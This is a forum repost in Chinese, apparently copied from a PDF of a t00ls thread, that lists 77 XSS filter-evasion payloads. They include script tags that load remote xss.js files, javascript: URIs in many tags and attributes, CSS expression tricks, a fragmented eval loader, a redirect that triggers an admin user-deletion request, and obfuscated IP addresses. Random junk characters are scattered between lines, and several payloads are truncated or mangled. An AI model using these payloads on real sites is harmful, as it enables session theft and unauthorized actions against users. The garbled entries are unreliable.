貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。# |3 f9 U* Z9 j: @
(1)普通的XSS JavaScript注入( _$ @, e1 E8 `: \1 ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% z0 Q' i4 {8 t
(2)IMG标签XSS使用JavaScript命令
3 u4 A( h7 S- e8 L, B" T" [9 V<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! X- ~# P- E# r0 Z# l(3)IMG标签无分号无引号' [, [1 Q, H) [
<IMG SRC=javascript:alert(‘XSS’)>
, Z. m- z! Z: b6 W(4)IMG标签大小写不敏感
* S3 d# v( D& M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
0 p: c$ S8 R( X* H(5)HTML编码(必须有分号)
1 i8 z* H) M7 V! E9 s, r; e, Y' l<IMG SRC=javascript:alert(“XSS”)>
2 S; K$ A5 C6 }(6)修正缺陷IMG标签/ O! q) t [4 K& K6 e2 D5 x
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' Y) s/ d3 a% @0 M$ \9 m
! D1 \6 k1 y4 W( h1 u( _7 X; j
+ E* `- b. t6 B- X5 k, W(7)formCharCode标签(计算器)
- l4 M5 {; D6 @3 L @7 M<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>% N5 H; p8 D$ a8 K! \) V( m
(8)UTF-8的Unicode编码(计算器)
! e9 B+ l0 { j* P5 N<IMG SRC=jav..省略..S')>
! Y' z; B8 |( I6 y(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 a( `8 {4 n" [! x; e1 A
<IMG SRC=jav..省略..S')>5 b0 O' M' o+ w3 m6 K
(10)十六进制编码也是没有分号(计算器)
/ a0 y) U# q6 M3 F2 _<IMG SRC=java..省略..XSS')>
4 s' C, x0 m, C3 |/ Z0 b1 S(11)嵌入式标签,将Javascript分开+ |1 o( u a! k U
<IMG SRC=”jav ascript:alert(‘XSS’);”># _0 t% K$ _, g [
(12)嵌入式编码标签,将Javascript分开2 x2 f J2 {) ?; {0 m. [3 l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' O! x/ z9 B/ ?, q5 g z(13)嵌入式换行符( p/ ]' v6 c4 W) D: a" t `
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 l4 [+ B7 S: ~8 i
(14)嵌入式回车 C9 g, W7 x% @- h o& T/ s; `- J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: [/ K1 n+ a& U L, J' i(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* f0 j' e8 |' R1 D" _<IMG SRC=”javascript:alert(‘XSS‘)”>
- N4 ]1 A/ V3 w* ?+ ]; w. }(16)解决限制字符(要求同页面)$ N, H' `: Z$ O. j( d N
<script>z=’document.’</script>0 D' b/ m0 g$ V- m
<script>z=z+’write(“‘</script>( h) O1 Y+ _" H0 x; t
<script>z=z+’<script’</script>
2 x k. Q ~: Y3 h0 V<script>z=z+’ src=ht’</script>
% C& o7 T! x5 f<script>z=z+’tp://ww’</script>
6 t$ C) p+ U+ f2 O0 s, a2 f<script>z=z+’w.shell’</script>3 r9 B# s* l" X$ ~* W
<script>z=z+’.net/1.’</script>7 V! H& K6 K' ^( I U4 Q+ l
<script>z=z+’js></sc’</script>
, O' j. t. [4 U# O<script>z=z+’ript>”)’</script>
% c8 z, g+ e: a/ W4 N5 v% r% H<script>eval_r(z)</script>* l2 J3 ]$ W& }+ o# u4 M9 T/ _3 T
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
% `6 E( v2 H$ k7 ^https://www.t00ls.net/viewthread ... table&tid=15267 2/6
) n5 |( y& U9 j `4 yperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 p! D, v2 t& W" g' ^# E
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 t/ X4 ^$ L( o+ z& l# f* ?: S7 `9 Vperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
! r1 [6 |7 c6 I F' S8 l5 y(19)Spaces和meta前的IMG标签) B3 r2 D, _4 f8 }2 G
<IMG SRC=” javascript:alert(‘XSS’);”>
; U* [0 H3 h0 ^7 H(20)Non-alpha-non-digit XSS, W) @7 S0 n, f, ^& I1 r* j( P% Q
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: e4 |% g- q4 ]) d; _5 G(21)Non-alpha-non-digit XSS to 2! I) y* m5 A: ]7 _) F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 X6 j* `* Q5 D8 G4 M) G% l" S
(22)Non-alpha-non-digit XSS to 3
7 x! J/ \) G0 q<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ O% T5 |( Z+ Q6 j
(23)双开括号
" a5 G3 b% a1 o# G W) f<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ G9 ^* b. z- r: _. s(24)无结束脚本标记(仅火狐等浏览器)7 L( i& t! u5 m
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ Y0 B* o, d- z8 q+ a4 s, d$ u4 C8 U(25)无结束脚本标记2* e/ D7 P9 o8 |
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 G4 S# R, j: [; z1 q: E: `(26)半开的HTML/JavaScript XSS' \: J4 x9 g# T
<IMG SRC=”javascript:alert(‘XSS’)”
& t2 ~6 I) @- `1 t+ J(27)双开角括号& R8 b, Z7 P# H" \
<iframe src=http://3w.org/XSS.html <
* I' e4 g9 @9 @( h/ o, Y& o3 A(28)无单引号 双引号 分号! l9 m; F3 i2 x
<SCRIPT>a=/XSS/
2 G9 I( P% E* Y+ _' h+ balert(a.source)</SCRIPT>
2 [3 t7 G3 n; P5 m9 T' R+ x7 ~(29)换码过滤的JavaScript
5 }% l5 ~" ]% C5 Z# i$ n! j\”;alert(‘XSS’);//; P7 r& A: t1 u" M; L
(30)结束Title标签0 e) H. n4 {" E1 X7 n, `& P
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 }6 p& H, Z4 L+ l# g0 W( K(31)Input Image
, C! l; d/ B& a$ t3 n<INPUT SRC=”javascript:alert(‘XSS’);”>
% i: ~5 u) @% {8 ]' ^; u# k(32)BODY Image6 `. i; c3 t* m2 k" ~' b
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>& E0 W2 s6 z4 ?1 |$ u5 J
(33)BODY标签' g" T$ ]" G# W6 u" b3 D
<BODY(‘XSS’)>
3 {( X# W, N6 ~3 V: u6 z, r(34)IMG Dynsrc' a: r0 W( q9 \' W
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
; Z3 E/ J# l5 ?& b d(35)IMG Lowsrc
4 V9 q" K5 y: ?+ F<IMG LOWSRC=”javascript:alert(‘XSS’)”>, C% _( H) i* E: m0 [
(36)BGSOUND
" Q4 X& s4 D% w) z% `<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 H+ Q p, E% _% L: R' z# q(37)STYLE sheet
2 Q- M- r3 S2 h% | V9 B<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, n$ p+ p1 r) p2 s q4 r
(38)远程样式表
. S, ]+ y* `3 s8 J3 V% f<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”># a$ M/ d# K; B! D7 r- n
(39)List-style-image(列表式)9 W; f% a" y9 m: [7 u( y+ {) F
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! X, a; S$ }2 y" m(40)IMG VBscript
1 W. Y6 F; K, J4 Y9 v<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% F3 b+ V3 r" a" a/ x* F4 ?(41)META链接url
# ^ K0 l& G/ o. k
. N) S" W" K! K: R& e [2 y3 h
- F' I3 W# e) B. m, Q1 I* i<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ b; B/ |& R% ?5 [URL=http://;URL=javascript:alert(‘XSS’);”>8 u' m* ^1 y, o- ~+ C4 K
(42)Iframe! j' u/ I: o" ~: P+ B
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> Z+ Z2 {4 B" c5 K$ W& X
(43)Frame0 i2 s, F6 N- t) u
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
$ F9 n! A [8 L5 j) h, T0 v0 Mhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6+ D( d( K6 I: M6 |
(44)Table
: i. S" A* x+ b# x7 t<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 x0 c' F4 z# l(45)TD
@. I( w1 [; u* B8 F9 I# n, K, N<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 P2 a( L; ` { F% o, s" h" o
(46)DIV background-image
}* `3 w; l4 J& ?4 F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' N# \' }: h7 U& R6 N- M8 l. g- i
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
^& J2 }3 |) l' j, I8&13&12288&65279)
I9 A, i- S4 d0 G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& a l3 [9 r4 |(48)DIV expression" O7 @ s( n5 m' k# }+ Q
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>0 ]6 r# x3 i5 t( c# V2 L# U
(49)STYLE属性分拆表达/ z1 ?$ F% K- e4 t( T) z. O. h
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>" w8 _1 A4 J! Q- b1 w
(50)匿名STYLE(组成:开角号和一个字母开头)
. c. J5 \( a# {' |<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>0 d- N% I+ |' l/ Z, B
(51)STYLE background-image
& q2 e8 Z: u M( q& E<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
; m. Y7 D! G2 z- y' `3 k2 qCLASS=XSS></A>
2 J! a. E4 F: R* L; Q5 i% O(52)IMG STYLE方式
0 ?8 K* y' v1 }$ F9 Yexppression(alert(“XSS”))’>
5 I v1 z6 ]5 y$ c0 h, S# \; b(53)STYLE background, z7 ?4 H* E& `
<STYLE><STYLE2 c% A% P, g0 v5 l: F$ s
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 {- P" j) @8 c/ _- j, b1 i(54)BASE
, @/ ^$ r. j6 G<BASE HREF=”javascript:alert(‘XSS’);//”>
) f* {6 n- b# @3 X8 _3 E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
' h' G! B/ t+ Z; J. y9 [# W6 f<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>% o5 q0 |/ \1 w
(56)在flash中使用ActionScrpt可以混进你XSS的代码
" c: o5 i" {/ I' [% ?. xa=”get”;2 X0 g0 a0 ?& x6 A
b=”URL(\”";1 o1 v" w# j( I: w9 [3 [( M" d$ I
c=”javascript:”;
. a7 O4 D2 O7 a5 E2 vd=”alert(‘XSS’);\”)”;
5 `. Z2 I. k& j0 h4 o" Ceval_r(a+b+c+d);! M# q) ^7 R& h. [! A
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; ~" O7 W8 g4 U<HTML xmlns:xss>- W' l1 b/ d/ r! ?5 \8 h
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 {0 p8 j, `7 K: D4 [<xss:xss>XSS</xss:xss>/ A$ k) k# D+ q$ l4 L( S% U9 J8 ?
</HTML>
/ z. J* w; I- W3 U5 r8 |5 M& L(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
, K: B7 P3 b9 i- M<SCRIPT SRC=””></SCRIPT>/ N, L: \: W% M: ~' G; C( N$ V
(59)IMG嵌入式命令,可执行任意命令% Z7 A1 y2 r3 m5 v0 R4 H/ l# }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>) g5 f' K) Y$ j
(60)IMG嵌入式命令(a.jpg在同服务器)
! P# ^0 G" z8 F3 W, g' fRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 Z4 \* }0 P7 m+ c* l; ^(61)绕符号过滤
+ E" R7 S" B# b& v<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># x2 d# `0 u7 q- n
(62): ^( J- I: b+ ~+ x
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! D: C4 w: l; o3 ~(63)! ~/ `0 K2 J v0 M0 c
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' r& j! S" Q/ i2 o* U(64)
! L/ k! m( [' q4 F<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 F. w3 I2 T: Y. w3 m" v3 l
(65)" w5 Z% W' c1 c/ ?
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. L, p( g7 O0 r$ O3 B9 z* D d) E! j" c+ h(66)12-7-1 T00LS - Powered by Discuz! Board
5 T6 V3 ]% _/ x0 thttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
& |# t9 L, V9 Z/ {- ~& e<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 R7 U6 @ w6 e' w(67)
# A1 h* \/ e8 U' d<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
" u1 t: P4 `3 t$ z4 N</SCRIPT>
3 f( M# L7 D& i7 p' F(68)URL绕行
4 z% M4 Q: s3 ]5 |5 k2 Y7 X5 m) o<A HREF=”http://127.0.0.1/”>XSS</A>" `/ Q' _2 p- g3 w+ B+ b# g* G- V/ @
(69)URL编码
# p3 [6 Z0 u) p+ o/ K<A HREF=”http://3w.org”>XSS</A>" d7 n: [8 }7 E
(70)IP十进制) p5 z7 |/ P/ ?0 Q& ` y3 k* p) B
<A HREF=”http://3232235521″>XSS</A>
/ n% b: G1 M" A$ M- K$ S(71)IP十六进制! W% h& O; m( c2 c; P! {, y
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# f+ w* }) }4 C/ a& ~; y2 R& S(72)IP八进制
5 V; v. I3 p3 n2 L<A HREF=”http://0300.0250.0000.0001″>XSS</A>! r8 I! R' D4 G/ i# s2 f
(73)混合编码
/ u0 @! N% e7 g/ u. C8 T<A HREF=”h t% b) k+ Y; I1 u' J# G
tt p://6 6.000146.0×7.147/”">XSS</A>, b, F& ~6 ]8 C6 V$ g5 P0 J4 y
(74)节省[http:]7 T- }8 M9 n0 d& Z1 Q
<A HREF=”//www.google.com/”>XSS</A>. ^0 e' ^6 z+ O6 [
(75)节省[www]* G* d6 Y' V' d, \4 i- y( Z
<A HREF=”http://google.com/”>XSS</A>
o: h3 X: h3 ]- K$ X% b) ?(76)绝对点绝对DNS4 n. x2 ^; ]) m! M
<A HREF=”http://www.google.com./”>XSS</A>
8 R0 e- H- e. } X N7 a(77)javascript链接
* l% C: n( p7 w" o P# X<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>& a# h5 x+ k& U% o# r: y
- E* c2 q4 w) d8 O, t9 u' `7 H原文地址:http://fuzzexp.org/u/0day/?p=14; f& [( Z$ z7 }( Z, s0 F
6 m: n# |5 B: O p |
发表于 2013-4-19 19:22:37
收藏
支持
反对